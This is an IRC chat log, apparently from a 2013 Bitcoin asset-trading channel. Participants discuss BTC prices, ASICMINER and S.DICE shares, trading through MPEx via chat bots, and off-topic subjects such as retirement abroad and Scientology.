10:38:51 It seems a crazy idea to me.. that might just work Mar 09 10:38:53 >_> Mar 09 10:39:09 i was told he has 60,000 btc locked in his offline never spend coins Mar 09 10:40:08 ;;calc 60000x44.5 Mar 09 10:40:08 Error: invalid syntax (, line 1) Mar 09 10:45:11 He reported having 60,000 bitcoind not in his never-spend, but in his "don't sell right now" 20% holdback from mining profits. Mar 09 10:45:29 He mined, and sold 80%, and kept 20%. Mar 09 10:45:57 ;;calc 60000*45 Mar 09 10:45:58 2700000 Mar 09 10:46:22 That was before he mined for another bunch of months and then started selling his designs to unknown third parties. Mar 09 10:48:55 mrb_ came in one time and started talking about something he'd heard existed: a preimage-like attack on the hashing algo which allowed a 2x speedup algorithmically, to any miner implementing it. Mar 09 10:50:20 it would be pretty awesome if that were real. Mar 09 10:51:11 how would it be awesome Mar 09 10:53:01 it would be awesome because FPGA would kill asic then. Mar 09 10:54:45 fpga needs a lot more than 2x to stay competitive. Mar 09 10:56:13 nah it doesn't. ;-) Mar 09 11:06:15 [BTCTC] [ASICMINER-PT] 1 @ 0.9 BTC [+] Mar 09 11:06:38 [BTCTC] [ASICMINER-PT] 3 @ 0.9 = 2.7 BTC [+] Mar 09 11:08:43 [MPEX] [S.DICE] 1000 @ 0.00549999 = 5.5 BTC [-] Mar 09 11:08:48 [MPEX] [S.DICE] 650 @ 0.0055 = 3.575 BTC [+] Mar 09 11:08:59 .9 go asicminer :) Mar 09 11:09:10 !ticker btctc asicminer-pt Mar 09 11:09:13 [BTCT:ASICMINER-PT] 1D: 0.65 / 0.65923 / 0.9 (449 shares, 296 BTC), 7D: 0.65 / 0.65303 / 0.9 (1046 shares, 683.1 BTC), 30D: 0.65 / 0.65303 / 0.9 (1046 shares, 683.1 BTC) Mar 09 11:09:18 .9 hey Mar 09 11:09:30 still low volume. Mar 09 11:09:38 i might cash out Mar 09 11:09:44 at 1 Mar 09 11:10:22 i expect this weeks or next weeks dividend to be awesome, and thus make more demand Mar 09 11:10:47 whens teh next one due? Mar 09 11:10:56 Goat, people seem to expect ASICMINER to continue paying 2 cents dividends per week for a year, which is a bit of too much confidence imho Mar 09 11:11:46 zefir i think they can hold on average 10% of the network for 2 years Mar 09 11:12:11 if they could, 0.9 is fair. still speculative Mar 09 11:12:18 and honestly bfl is 1.5 months away at best i think, if we get to 12 th and then 60 th, we will be killing it:) Mar 09 11:12:20 crazy to pay those prices for asicminer Mar 09 11:12:22 zefir well, finance is speculative. Mar 09 11:12:36 bfl is never delivering anything. Mar 09 11:12:57 not right, my BFLS are the most stable mining devices i had so far Mar 09 11:13:03 if bfl did fail on the chips it would be awesome for asicminer, we would have 50% not 10% of the network Mar 09 11:13:21 zefir http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ Mar 09 11:13:24 just going by that Mar 09 11:13:34 is there going to be a new primeasic thing? Mar 09 11:13:40 i need to buy one hey Mar 09 11:13:56 expect there to be more competitors than BFL in July Mar 09 11:13:56 Chaang-Noi about one third asicminer, one third avalon, one third old network + others Mar 09 11:14:01 is the best reasonable expectation. Mar 09 11:14:08 zefir for sure. Mar 09 11:14:22 the actual asic producer has not yet been born i would guess. Mar 09 11:14:25 i'm ready to buy now Mar 09 11:14:28 can i buy anything? Mar 09 11:14:48 even if bfl does ship, first batch is only 25 th right? avalon is less? Mar 09 11:15:08 avalon has about 10-20th being delivered atm and making another what, 20-50 Mar 09 11:15:16 0.9 is tempting for a quick buck i must say. but if bitcoin as a whole takes of (like is currently doing) long term, holding some asicminer could be your retirement ;) Mar 09 11:15:22 asicminer has a 10ish being delivered and making another 20-50 Mar 09 11:15:26 they're really very equal. Mar 09 11:15:40 [BTCTC] [ASICMINER-PT] 21 @ 0.9 = 18.9 BTC [+] Mar 09 11:15:53 yeah zefir, i bought back much of what i sold around .5 to .6 Mar 09 11:16:00 [BTCTC] [ASICMINER-PT] 20 @ 0.975 = 19.5 BTC [+] Mar 09 11:16:05 lol Mar 09 11:16:07 lol what a strategy Mar 09 11:16:11 Goat, you're in the board again? Mar 09 11:16:15 [BTCTC] [ASICMINER-PT] 25 @ 1 = 25 BTC [+] Mar 09 11:16:24 this is insane! Mar 09 11:16:27 zefir saldy im still short Mar 09 11:16:44 wow Mar 09 11:16:55 i have the remaining shares for you. 1BTC each ;) Mar 09 11:17:00 anyone want to buy 50 for 2btc? Mar 09 11:17:40 zefir that was my shares that just got sold at 1 btc Mar 09 11:17:51 [BTCTC] [S.DICE-PT] 500 @ 0.0057 = 2.85 BTC [+] Mar 09 11:17:58 ;) congrats! Mar 09 11:18:09 thanks Mar 09 11:18:23 i think we could go higher, but i can part with 25 :) Mar 09 11:18:27 let me know when it gets to 1.5 or 2 - i'm out then. Mar 09 11:18:54 Goat, how much coins do i need in hand to retire in Thailand? Mar 09 11:19:08 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.21735385 = 217.3539 BTC [-] Mar 09 11:19:17 we're about to ram $45 per coin Mar 09 11:19:19 1000bat Mar 09 11:19:30 zefir i have a wife and a kid, very nice house, and everything, i live very well here on $15,000 a year Mar 09 11:19:43 nice Mar 09 11:19:47 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.19526866 = 195.2687 BTC [-] Mar 09 11:20:04 if you did $30k a year you would really live it up Mar 09 11:20:06 $15,000.. thats what I earned 2 years ago as a cashier Mar 09 11:20:11 in 6 months btw Mar 09 11:20:12 lol Mar 09 11:20:18 k, 7 actually Mar 09 11:20:21 pay is lower here Mar 09 11:20:23 ok, so like 10k coins and i'm done. that is 1.5BTC per ASICMINER and you see me there ;) Mar 09 11:20:32 average wage here is $200 a month Mar 09 11:20:38 nice zefir Mar 09 11:20:40 so around 4 bitcoins then Mar 09 11:20:43 i might do the same and go to phils Mar 09 11:20:57 200 bucks a month Mar 09 11:21:04 i've done it already. retirement is boring as shit. Mar 09 11:21:05 thats what i spend on a nice meal in vancouver Mar 09 11:21:13 costs are lower here Mar 09 11:21:22 whatever mircea lul Mar 09 11:21:26 woudlnt it be grand if i make money here Mar 09 11:21:26 srsly. Mar 09 11:21:28 this is too easy, there must be some hook in there Mar 09 11:21:31 my 3 bed room house with garden and all that is only $160 a month rent Mar 09 11:21:32 then spend it in some 3rd world country Mar 09 11:21:32 lol Mar 09 11:21:39 ya Mar 09 11:21:40 why dont u just buy it Mar 09 11:21:43 that's what i would do if i was bored Mar 09 11:21:45 help others Mar 09 11:22:11 i am. Mar 09 11:22:24 zefir hook? Mar 09 11:22:24 then you cant get that bored Mar 09 11:22:25 :) Mar 09 11:22:34 well atm im not bored, all with mpex and shit. Mar 09 11:22:43 but a few years ago it was major yawn time. Mar 09 11:22:56 you just dont know how to have fun with your money Mar 09 11:23:01 how did you retire the first time? Mar 09 11:23:06 Goat, it can't be that easy. but well, my problem is my wife will not follow to Thailand, so i'm out for now :( Mar 09 11:23:20 you can get about 10 wives in thailand Mar 09 11:23:22 her lost Mar 09 11:23:32 ahh zefir i got a thai wife, thats the smart way to do it:) Mar 09 11:23:44 maybe, but not the one wife you get used to ;) Mar 09 11:23:52 doesn't that get boring? Mar 09 11:24:02 like watching the same movie over and over and over again every day? Mar 09 11:24:04 you mean the only one wife? Mar 09 11:24:11 bithub is right, you can have more than one here, in thai they even have words for ranking them Mar 09 11:24:29 chaaang i'm thinking Mar 09 11:24:35 if i send you some btc Mar 09 11:24:39 no, can't complain. it is a give and take - she also has to watch the same tv show Mar 09 11:24:46 can you jsut buy thai women for me and put them all in a house? Mar 09 11:24:52 toffoo what do you mean how ? Mar 09 11:24:54 i want a stable Mar 09 11:25:13 well i imagine you'll retire a second time from mpex someday soon, Mar 09 11:25:19 highly unethical Mar 09 11:25:20 hehe Mar 09 11:25:23 in thailand you can only rent thai women, however you can buy women from outher countries Mar 09 11:25:24 zefir BitHub i guess there's about 20 years keeping you apart. Mar 09 11:25:36 just curious how you did it the first time .. before bitcoin Mar 09 11:25:37 i'm 40 Mar 09 11:25:38 toffoo i don't think it'll be too soon. Mar 09 11:25:48 how old are you mate? :) Mar 09 11:25:53 toffoo i sold everythign and went to costa rica, basically. Mar 09 11:26:04 but went back? Mar 09 11:26:07 heh i heard that's the best place to setup a company Mar 09 11:26:08 too boring there? Mar 09 11:26:16 is that why you went to costa? Mar 09 11:26:22 well eventually you have enough of playing poker with aging american expats Mar 09 11:26:37 tax breaks Mar 09 11:26:39 the rum was good, the aguacate nice, the mango fantastic an so on Mar 09 11:26:53 but after a while retirement becomes unbearable. Mar 09 11:27:03 missing the good life back in romania? Mar 09 11:27:23 because you cant cash out a million dollars worth of btc? Mar 09 11:27:37 toffoo hehe, romania of the 90s was... exciting. Mar 09 11:27:51 i don't get it mircea Mar 09 11:27:57 BitHub what's that ? Mar 09 11:28:11 how you can be bored Mar 09 11:28:15 i'm bored but i'm poor Mar 09 11:28:35 cause how bored you are depends on what you're doing not on how rich you are. Mar 09 11:28:47 heck, i know plenty of bored rich people. Mar 09 11:28:48 its all about the numbers baby Mar 09 11:29:00 if you're rich and bored you don't deserve to have money Mar 09 11:29:09 what'd you do ? Mar 09 11:29:25 there's only so much flan a person can eat, to quote one of the recent billionaires. Mar 09 11:29:26 stayed poor Mar 09 11:29:34 haha Mar 09 11:29:45 flange Mar 09 11:30:38 hmm what would i do Mar 09 11:30:59 well first step i would look at all the people in my life, family and really close friends and solve all their money problems Mar 09 11:31:02 that's fun Mar 09 11:31:31 that's stupid. Mar 09 11:31:38 within a coupla years they'll have worse money problems. Mar 09 11:31:48 but i solved them Mar 09 11:31:49 there's a reason they have them now, and that reason ain't the aliens. Mar 09 11:32:04 nah they wont they Mar 09 11:32:06 you can't solve people's problems for them. Mar 09 11:32:07 'll be sweet Mar 09 11:32:29 that's true, good thing i've got no friends so i would just help my family Mar 09 11:33:22 mkay, so that's murky. what else ? Mar 09 11:33:27 i'm pretty sure i would be dead within a month, i would just go to psycho with the money Mar 09 11:33:41 driving pass people throwing wads of cash at them Mar 09 11:33:49 ya well, that's the thing. takes a lot of brains to be rich and bored in the end. Mar 09 11:34:02 most dumbasses that win the lottery end up dead / in jail / poor again Mar 09 11:34:17 i guess its boring when you're not just burning through it without caring Mar 09 11:34:20 that's when its really fun Mar 09 11:34:35 no, that's when it's really obvious how empty/pointless/mindless you really are. Mar 09 11:35:48 not really, sometimes just dont care Mar 09 11:37:12 um what else, probably hire 100 social media trolls and have them in a office and just kick back and watch them troll certain celebs or public figures Mar 09 11:38:49 actually mircea i would just be making movies Mar 09 11:38:51 full time Mar 09 11:39:04 that would be really fun to me Mar 09 11:39:34 that may work yea Mar 09 11:39:37 but it is not retirement. Mar 09 11:40:39 ahh okey hmm retirement lets see, all you can do is just travel the world hey getting into adventures, meeting random girls Mar 09 11:41:09 definitly got to check out alot more countries in my time :) Mar 09 11:42:24 yeah, tghat may be fun Mar 09 11:42:31 but after a while it gets utterly boring. Mar 09 11:43:15 how old are you, if you dont mind me asking? Mar 09 11:43:15 mentlegen, we hit $45 once again Mar 09 11:43:46 now where is that troll who said btc top was $24 dollars Mar 09 11:43:46 lol Mar 09 11:43:54 ;;ticker Mar 09 11:43:55 BTCUSD ticker | Best bid: 45.29000, Best ask: 45.46212, Bid-ask spread: 0.17212, Last trade: 45.46212, 24 hour volume: 42365.65870584, 24 hour low: 42.50000, 24 hour high: 45.50000, 24 hour vwap: 43.84294 Mar 09 11:44:00 nice i want to see 50 after weekend tho Mar 09 11:44:02 funny, calls sold earlier lol Mar 09 11:45:18 i just a fucking house in vancouver Mar 09 11:45:19 geez Mar 09 11:45:33 i thought that was the whole point of life in vancouver. be the landowner master race Mar 09 11:45:48 so that you can charge rent on the basement, get the basement to pay for the mortgage Mar 09 11:45:56 then watch hockey Mar 09 11:45:57 lol Mar 09 11:46:02 thats the canadian dream Mar 09 11:46:07 heh Mar 09 11:46:08 or vancouver dream. Mar 09 11:46:16 everyone here is crazy about houses Mar 09 11:46:33 my uncle owns 3, he gets about 8k a month on his houses Mar 09 11:46:36 for rent Mar 09 11:46:49 i didnt tell him about bitcoins.. hes too rich already Mar 09 11:46:50 heh Mar 09 11:48:16 you should Mar 09 11:48:25 (make him buy like, 200k usd worth of btc?" Mar 09 11:48:29 xD Mar 09 11:48:33 lol Mar 09 11:48:41 then slowwly sell it back and make negative profit Mar 09 11:48:54 nah, hes a batshit religious person.. conservative Mar 09 11:48:58 he wont touch btc anyway Mar 09 11:49:16 ok Mar 09 11:49:17 i feel bad for his kid Mar 09 11:49:22 well Mar 09 11:49:26 his kid is like 18 now, cant go out Mar 09 11:49:33 what does that have to do with bitcoin? Mar 09 11:49:40 if he's religious batshit person Mar 09 11:49:47 he might still like btc xD Mar 09 11:49:51 batshit is a nice term, +1 Mar 09 11:49:52 i doubt it lol Mar 09 11:50:01 hmm Mar 09 11:50:05 well tell his kid about it Mar 09 11:50:07 and shake his hed Mar 09 11:50:09 when we arrived in canada Mar 09 11:50:09 head* Mar 09 11:50:16 .. he gave us free rent Mar 09 11:50:20 .. but.. Mar 09 11:50:29 when we told him, we're not converting to your religion Mar 09 11:50:35 he started charging us rent Mar 09 11:50:36 lol Mar 09 11:50:46 =) Mar 09 11:50:49 whatta douche Mar 09 11:50:50 im like. lol Mar 09 11:50:55 you know what Mar 09 11:50:59 i would've laugh at him Mar 09 11:51:00 :D Mar 09 11:51:11 its not really him tho Mar 09 11:51:13 its his wife Mar 09 11:51:17 thats the boss Mar 09 11:51:22 whats his religion btc Mar 09 11:51:23 btw* Mar 09 11:51:23 ? Mar 09 11:51:29 protestant or something Mar 09 11:51:32 wut Mar 09 11:51:37 thinks everyone will go to hell Mar 09 11:52:00 protestant.. its like a branch of christianity Mar 09 11:52:30 kinda like how catholic is bitcoin, then a protestant would be a fork of it Mar 09 11:52:34 lol Mar 09 11:52:45 good it wasnt this: http://en.wikipedia.org/wiki/Scientology Mar 09 11:52:57 yeah Mar 09 11:52:59 nah. hes not that batshit Mar 09 11:53:03 :D Mar 09 11:53:15 in finland there's 2 places where they recruit for that thing Mar 09 11:53:20 so, me and my friend once went there Mar 09 11:53:24 theres one in vancouver too Mar 09 11:53:30 not going in there. lol Mar 09 11:53:34 made some kind of test Mar 09 11:53:43 then they wanted us to be in separate rooms Mar 09 11:53:56 so they could turn ur individually to the scientology Mar 09 11:54:03 well, we ain't stupid so.. xD Mar 09 11:54:15 they killed this chick Mar 09 11:54:17 didnt take much time to see they're scientologists Mar 09 11:54:18 i forgot her name Mar 09 11:54:21 lisa or something.. Mar 09 11:54:22 in 1996 Mar 09 11:54:27 lisa mcpherson Mar 09 11:54:29 there we go Mar 09 11:54:29 why Mar 09 11:54:34 starved her to death Mar 09 11:54:38 ok Mar 09 11:54:41 hmm Mar 09 11:54:48 http://en.wikipedia.org/wiki/Death_of_Lisa_McPherson Mar 09 11:54:55 okay, 1995. im off Mar 09 11:55:01 btw, we went to that scientology recruiment place cuz we were handed a note in the city Mar 09 11:58:06 [BTCTC] [BTC-BOND] 100 @ 0.00999 = 0.999 BTC [+] Mar 09 12:03:50 ehh what's this, ian bakewell default ? Mar 09 12:04:23 Mhm.. he disappeared Mar 09 12:04:30 ouch Mar 09 12:04:41 Damn, and to think I thought I was gonna send him some BTC Mar 09 12:04:47 I cleared a land mine. heh Mar 09 12:05:05 He said he should have no problem paying unless BTC hits $40/BTC Mar 09 12:05:53 lol ok. Mar 09 12:07:44 "Short BTC600 @ $34.50 Short 40,000 S.DICE @ .0062 Cover date: May 17 2013 | Before 12Noon MST" Mar 09 12:07:50 According to Ian's signature Mar 09 12:07:56 he's gonna have a bad time Mar 09 12:09:02 "I should have no problem repaying this as long as BTC stays bellow $41.66 ... if it goes above we would need to work something out for a bit more time to repay." Mar 09 12:09:06 Tsk tsk tsk Mar 09 12:09:24 ;;ticker Mar 09 12:09:25 BTCUSD ticker | Best bid: 45.86278, Best ask: 45.90000, Bid-ask spread: 0.03722, Last trade: 45.90000, 24 hour volume: 45521.41888267, 24 hour low: 42.50000, 24 hour high: 45.90000, 24 hour vwap: 43.97923 Mar 09 12:09:35 I lent some $100 worth of BTC back in january for 3 weeks Mar 09 12:09:40 that was some agonizing days Mar 09 12:09:48 I didn't know if the guy was a scammer or not Mar 09 12:09:58 .. i am not willing to put myself through that again Mar 09 12:10:00 lol Mar 09 12:11:28 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.90144085 = 901.4409 BTC [-] Mar 09 12:11:50 heh. Mar 09 12:12:21 lending out to someone with btc is similar to gambling imo Mar 09 12:12:30 just put it thru dice, at least its faster Mar 09 12:12:31 lol Mar 09 12:13:54 with dice it's provably fair. Mar 09 12:16:29 I told an acquiantance about BTC when they were 17 dollars, they were on the fence about it. They wanted to buy at 28 dollars, but got scared when the price dropped to $20 Mar 09 12:16:42 now that its $45.. they want to buy again Mar 09 12:16:54 but never follow through Mar 09 12:16:56 how it works. Mar 09 12:17:42 I told him hey, I think BTC will go up. I've put a bit of fiat in it to show my conviction Mar 09 12:18:19 if BTC goes up, they say.. it's a fucking bubble! if BTC goes down.. "It's dying/fad/crash" Mar 09 12:18:27 hilarious Mar 09 12:19:08 yup Mar 09 12:19:21 I told him I'll sell him $100 worth for 2 BTC. They wanted 5. They could have gotten 5+ from me back in Jan Mar 09 12:19:27 it recovered nicely after the correction 2 days ago Mar 09 12:19:30 indeed a bear trap Mar 09 12:20:01 I'm looking forward to the day that that guy still hasn't bought a coin where BTC reaches $1000 Mar 09 12:20:30 I'll be like, yeah I'll sell you $500 worth for 0.5 BTC, just remember it could go down, ect Mar 09 12:20:33 gonna be fun. Mar 09 12:21:03 haha that's a plan. Mar 09 12:21:44 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.90009169 = 900.0917 BTC [-] Mar 09 12:22:21 ;;later tell namworld https://bitcointalk.org/index.php?topic=87358.60 Mar 09 12:22:22 The operation succeeded. Mar 09 12:25:11 it sucked for me canadianbitcoins sold at $55 dollars when BTC dropped to $33 Mar 09 12:25:15 pretty smart move Mar 09 12:25:28 I would have dumped more fiat into it Mar 09 12:31:40 [MPEX] [O.BTCUSD.P750T] 375 @ 0.89918038 = 337.1926 BTC [-] Mar 09 12:31:51 !ticker m 750 Mar 09 12:31:53 I don't give a shit who saw what and who did what or who did who. Mar 09 12:31:59 !ticker m O.BTCUSD.P750 Mar 09 12:32:00 The vision of Christ that thou dost see ... is my vision's greatest enemy. Mar 09 12:32:10 !ticker m P750t Mar 09 12:32:12 Your actions are useless. Mar 09 12:32:16 :( Mar 09 12:32:19 !ticker m O.BTCUSD.P750T Mar 09 12:32:20 [MPEX:O.BTCUSD.P750T] 1D: 0.89918038 / 0.90051586 / 0.90144085 (2375 shares, 2,138.73 BTC), 7D: 0.85433966 / 0.9786482 / 1.12260046 (23750 shares, 23,242.89 BTC), 30D: 0.85433966 / 1.06533167 / 1.53153505 (28750 shares, 30,628.29 BTC) Mar 09 12:32:34 lol this put Mar 09 12:43:21 ;;asks 46 Mar 09 12:43:26 There are currently 0 bitcoins offered at or under 46.0 USD, worth 0.0 USD in total. | Data vintage: 0.0015 seconds Mar 09 12:43:37 ;;ticker Mar 09 12:43:39 BTCUSD ticker | Best bid: 46.50000, Best ask: 46.53000, Bid-ask spread: 0.03000, Last trade: 46.53000, 24 hour volume: 47202.58375913, 24 hour low: 42.50000, 24 hour high: 46.53000, 24 hour vwap: 44.11301 Mar 09 12:43:47 well shit Mar 09 12:44:02 ;;asks 49.1 Mar 09 12:44:02 There are currently 26201.882 bitcoins offered at or under 49.1 USD, worth 1266194.78506 USD in total. | Data vintage: 36.3364 seconds Mar 09 12:44:22 chang Mar 09 12:44:31 check the price real time at coinlab Mar 09 12:44:34 its entertaining Mar 09 12:44:35 lol Mar 09 12:45:24 interesting, auto refreshes? Mar 09 12:45:38 guess so damn Mar 09 12:46:05 yah Mar 09 12:46:08 you watching? Mar 09 12:46:16 46.80 Mar 09 12:46:21 im okay with this Mar 09 12:46:43 i guess we are going to keep on trucking up Mar 09 12:47:04 imo just drive the price up and dont sell Mar 09 12:47:09 use BTC for transactions Mar 09 12:47:19 .. that ends up being win win Mar 09 12:47:23 as opposed to lose lose Mar 09 12:47:33 where the seller gets fiat and the BTC value goes down Mar 09 12:47:57 we're about to break 47 Mar 09 12:48:37 ;;ticker Mar 09 12:48:38 BTCUSD ticker | Best bid: 46.64600, Best ask: 46.74600, Bid-ask spread: 0.10000, Last trade: 46.64600, 24 hour volume: 48033.54388684, 24 hour low: 42.50000, 24 hour high: 46.99000, 24 hour vwap: 44.16232 Mar 09 12:48:46 ;;asks 47 Mar 09 12:48:51 There are currently 1303.7427 bitcoins offered at or under 47.0 USD, worth 61254.5594943 USD in total. | Data vintage: 0.0016 seconds Mar 09 12:56:49 mhm, i see lots of resistance before 50 Mar 09 12:56:53 i see little fiat Mar 09 12:57:01 we need moe support Mar 09 13:01:13 sell off Mar 09 13:01:14 hah Mar 09 13:08:18 [BTCTC] [COGNITIVE] 1 @ 0.2201 BTC [-] Mar 09 13:08:20 [BTCTC] [COGNITIVE] 1 @ 0.22003 BTC [-] Mar 09 13:08:22 [BTCTC] [COGNITIVE] 1 @ 0.22 BTC [-] Mar 09 13:08:24 [BTCTC] [COGNITIVE] 10 @ 0.22 = 2.2 BTC [-] Mar 09 13:09:46 it's the weekend Mar 09 13:15:22 yeah $45 is still pretty epic Mar 09 13:17:51 "still"? Mar 09 13:18:07 Id stay breaking $32 barrier was epic! Mar 09 13:19:02 btw.. Mar 09 13:19:12 it's funny mp has rated gigavps -10 and pirateat40 -1 Mar 09 13:20:13 so huh, whats worse, running a ponzi or pt to ponzi? Mar 09 13:24:40 and the dump continues Mar 09 13:24:43 ;;ticker Mar 09 13:24:43 BTCUSD ticker | Best bid: 45.27000, Best ask: 45.28000, Bid-ask spread: 0.01000, Last trade: 45.26000, 24 hour volume: 49103.52015343, 24 hour low: 42.50000, 24 hour high: 46.99000, 24 hour vwap: 44.22567 Mar 09 13:24:51 Anduck i rated pirate before his scam went bust Mar 09 13:24:58 and then didn't want to update the rating out of vanity Mar 09 13:25:05 i like being the first one with the neg. Mar 09 13:25:12 k Mar 09 13:30:48 coinlab should update their logo with the recent correction **** BEGIN LOGGING AT Sat Mar 9 22:28:27 2013 Mar 09 22:28:37 I read it Mar 09 22:28:47 maybe mircea_popescu has some updates Mar 09 22:28:54 hi all. Mar 09 22:29:10 Hey Mar 09 22:29:13 21:28.00 ( MJR_ ) Mp still having trouble? Mar 09 22:29:13 21:28.10 ( kakobrekla ) half way, see topic Mar 09 22:29:13 21:28.27 .•• mircea_popescu ( ~Mircea@pdpc/supporter/silver/mircea-popescu ) joined #bitcoin-assets Mar 09 22:29:30 MJR_ trade is atm going on through the irc bots. Mar 09 22:29:36 Cool Mar 09 22:29:49 this is actually fully functional, if a little inconvenient still Mar 09 22:29:56 Noticed S.DICE rebounded a little bit Mar 09 22:29:56 until someone makes a pympex equivalent Mar 09 22:30:01 yeah Mar 09 22:30:18 mircea_popescu: Mar 09 22:30:18 21:22.48 ( kakobrekla ) "Only Satoshi the Bitcoin Cyber-Christ is going to save us." -Max Keiser Mar 09 22:30:18 Was wondering about an mpex.onion Mar 09 22:30:18 21:22.48 ( kakobrekla ) https://www.youtube.com/watch?feature=player_embedded&v=_t39jCXXIrY Mar 09 22:30:43 I think that guy is on meth before every show Mar 09 22:30:51 MJR_: PM Mar 09 22:30:54 MJR_ i am having a few set up. Mar 09 22:31:05 Cool Mar 09 22:31:15 the thing is, Mar 09 22:31:22 tor network may not be solid enough to cope Mar 09 22:32:08 Yeah I was worried about that Mar 09 22:32:36 How do I encrypt with MPEx's public key? Mar 09 22:32:36 I am trying out a new irc client Mar 09 22:33:13 Namworld gpg --encrypt --armor -r F1B69921 Mar 09 22:33:45 Ah, thanks. I keep forgetting how to write the command. Mar 09 22:34:01 I can't seem to find a good website that lists commands and common operations Mar 09 22:38:24 make one Mar 09 22:41:03 man2htm Mar 09 22:41:17 :D Mar 09 22:41:39 totally. Mar 09 22:45:23 !Ticker mpex s.dice Mar 09 22:46:03 !ticker mpex s.dice Mar 09 22:46:03 [MPEX] [S.MPOE] 1 @ 0.00067638 BTC [-] Mar 09 22:46:05 [MPEX:S.DICE] 1D: 0.00549999 / 0.00550022 / 0.005884 (1651 shares, 9.08 BTC), 7D: 0.00300001 / 0.00548202 / 0.006225 (503030 shares, 2,757.62 BTC), 30D: 0.00300001 / 0.0061622 / 0.0069 (3739840 shares, 23,045.67 BTC) Mar 09 22:46:16 caps not allowed on irc Mar 09 22:46:33 anyway, the evolution of s.dice is beyond funny, Mar 09 22:46:39 Yes Mar 09 22:46:49 mircea_popescu: porn not allowed on blog Mar 09 22:46:50 1. price collapse pre dividends ; 2. short rebound post dividends ; further rebound while mpex is beinh ddosed Mar 09 22:46:59 if this is not contrary to what you'd expect i dunno what is Mar 09 22:47:07 🐤 Mar 09 22:47:07 Anduck who told you that ?! Mar 09 22:47:22 it's the will of internet gods Mar 09 22:47:50 im with the internet goddesses, sorry. Mar 09 22:48:08 Lol, I thought we were the Internet gods Mar 09 22:48:21 LOL guys been trolled again Mar 09 22:48:29 srs, no. you cant hang out with them. Mar 09 22:48:35 dunno bout' dem goddesses Mar 09 22:48:48 it shows. Mar 09 22:49:58 mircea_popescu: Can you see the symbol between the quotes? "⚡" Mar 09 22:50:31 yea Mar 09 22:50:37 Cool Mar 09 22:50:42 why ? Mar 09 22:50:56 Was not sure if other symbols would be able to be seen Mar 09 22:51:11 I suppose it depends on the client Mar 09 22:51:14 !mp http://dpaste.com/1017561/ Mar 09 22:51:15 Processing. Mar 09 22:51:16 Response: http://dpaste.com/1017563/plain/ Mar 09 22:51:25 https://bitcointalk.org/index.php?topic=150818.0 ahaha dude the forum's so funny Mar 09 22:51:28 $vwap Mar 09 22:51:31 mircea_popescu: http://pastebin.com/605WGNKB Mar 09 22:52:53 .9 for AM eh Mar 09 22:53:05 dub girl said .75 to 1.5 Mar 09 22:53:09 am dully follows. Mar 09 22:53:41 hmm, could be my new truck Mar 09 22:54:05 ;;later tell vampirebb the mpex inbound address will be linked to most mpex withdrawals. a user can withdraw to an arbitrary address of his choice. Mar 09 22:54:05 The operation succeeded. Mar 09 22:54:26 !mp http://dpaste.com/1017564/ Mar 09 22:54:26 Processing. Mar 09 22:54:28 Response: http://dpaste.com/1017566/plain/ Mar 09 22:54:55 jborkl you're doing something wrong because people have been trading ok on this system Mar 09 22:55:19 I am on my phone trying to get android to work Mar 09 22:55:21 are you cleanly doing your encoding ? is your key correct ? (siometimes gpg defaults to wrong key, use a ! at the end of your keyid to force) Mar 09 22:56:03 https://bitcointalk.org/index.php?topic=150818.0 lol these people. Mar 09 22:58:51 https://bitcointalk.org/index.php?topic=99497.msg1604192#msg1604192 friedcat speaks Mar 09 22:59:04 mircea_popescu: is the mpex FAQ somewhere available in a pastie or can it be included in an mpex client? Mar 09 22:59:24 FabianB_ 1 sec Mar 09 23:00:34 http://pastebin.com/6HuinLvf Mar 09 23:00:59 if you wish to include a local copy in a bundle you distribute, such as a client or anything Mar 09 23:01:14 i want you to commit that all new versions will include a faq current at the time of their release. Mar 09 23:01:34 that's pretty much the only condition. Mar 09 23:03:35 It should be complete as well Mar 09 23:03:36 ok, in case i release my client to the public i'll include it in all releases; in case i don't maintain it anymore i'll make a release with FAQ removed with just a link to then current mpex site Mar 09 23:03:51 FabianB_ if you don't maintain it anymore you're not in breach. Mar 09 23:04:02 the only thing is to not ship client august 11th with faq from june 3rd Mar 09 23:04:09 If you neglect to keep the smoky dragon award Mar 09 23:04:25 ok, that won't be a problem then Mar 09 23:05:43 you can do all languages available or pick one Mar 09 23:05:56 but be a sport and don't pick "some". Mar 09 23:07:33 heh, yeah, just thought of the english one Mar 09 23:07:37 works. Mar 09 23:08:23 dunno if i like to include chinese and persian as long as the clients documentation itself is just english Mar 09 23:08:36 Hmmm I think I am going to enter the WOT today Mar 09 23:08:37 sure, just one language is ok Mar 09 23:13:09 If we get the 60TH/s online (conservative) in late April, and the hashrate of the full network from that time is 200TH/s which linearly increases to 1,000TH/s in late December. (200+1000)/2 = 600. So we will have 10% in average of the full network from late April to late December. That translates to about 88,000 Bitcoins total mined. That is 0.22BTC/share of gross income in eight months. Mar 09 23:13:28 so where's the "you get your money back in 8 months therefore asicminer is worth like .15" talk ? Mar 09 23:13:56 lol Mar 09 23:19:39 What do you think it's worth? Mar 09 23:20:43 worth ? about .05 - .1 Mar 09 23:20:49 !help Mar 09 23:20:50 List of commands: Mar 09 23:20:51 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 09 23:20:52 !mp (desc: returns the response from MPEX order) Mar 09 23:20:54 that has no bearing however, idiots are in full mania mode, so, Mar 09 23:21:01 you'll be able to sell up to 10x-100x that Mar 09 23:22:15 !mp help Mar 09 23:22:16 Please use http://dpaste.com/ Mar 09 23:22:34 !help mp Mar 09 23:22:35 List of commands: Mar 09 23:22:36 Thanks assbot Mar 09 23:22:36 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 09 23:22:37 !mp (desc: returns the response from MPEX order) Mar 09 23:23:00 yeah, I think understanding net present value may be beyond some members of the bitcoin community Mar 09 23:23:07 kakobrekla : can you make assbot ticker identifier to be hungry ? Mar 09 23:23:13 such as !ticker m C600T Mar 09 23:23:45 MJR_ what makes me very glad & happy is this : Mar 09 23:23:50 !ticker btct asicminer-pt Mar 09 23:23:53 [BTCT:ASICMINER-PT] 1D: 0.679 / 0.90043 / 1 (167 shares, 150.4 BTC), 7D: 0.65 / 0.68589 / 1 (1170 shares, 802.5 BTC), 30D: 0.65 / 0.68589 / 1 (1170 shares, 802.5 BTC) Mar 09 23:24:09 the fact that the bitcoindiots are reduced to < 1k btc disposable income is indeed good news. Mar 09 